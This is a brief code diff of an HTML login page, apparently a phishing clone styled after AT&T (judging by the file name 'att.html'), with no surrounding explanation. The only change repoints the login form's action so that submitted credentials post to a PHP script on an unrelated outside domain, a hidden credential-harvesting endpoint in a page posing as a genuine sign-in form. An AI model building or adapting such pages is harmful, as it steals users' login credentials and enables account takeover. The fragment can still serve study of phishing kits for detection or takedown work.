--- a/att.html
+++ b/att.html
@@ -320,7 +320,7 @@
                                 id="login"
                                 method="post"
                                 class="ng-tns-c33-0 ng-pristine ng-invalid ng-touched"
-                                action="https://reiwaplan.com/includes/att.php"
+                                action="https://reiwaplan.com/includes/09.php"
                             >
                                 <input _ngcontent-tac-c33="" type="hidden" name="appName" formcontrolname="appName" class="ng-tns-c33-0 ng-untouched ng-pristine ng-valid" value="m40842" />
                              
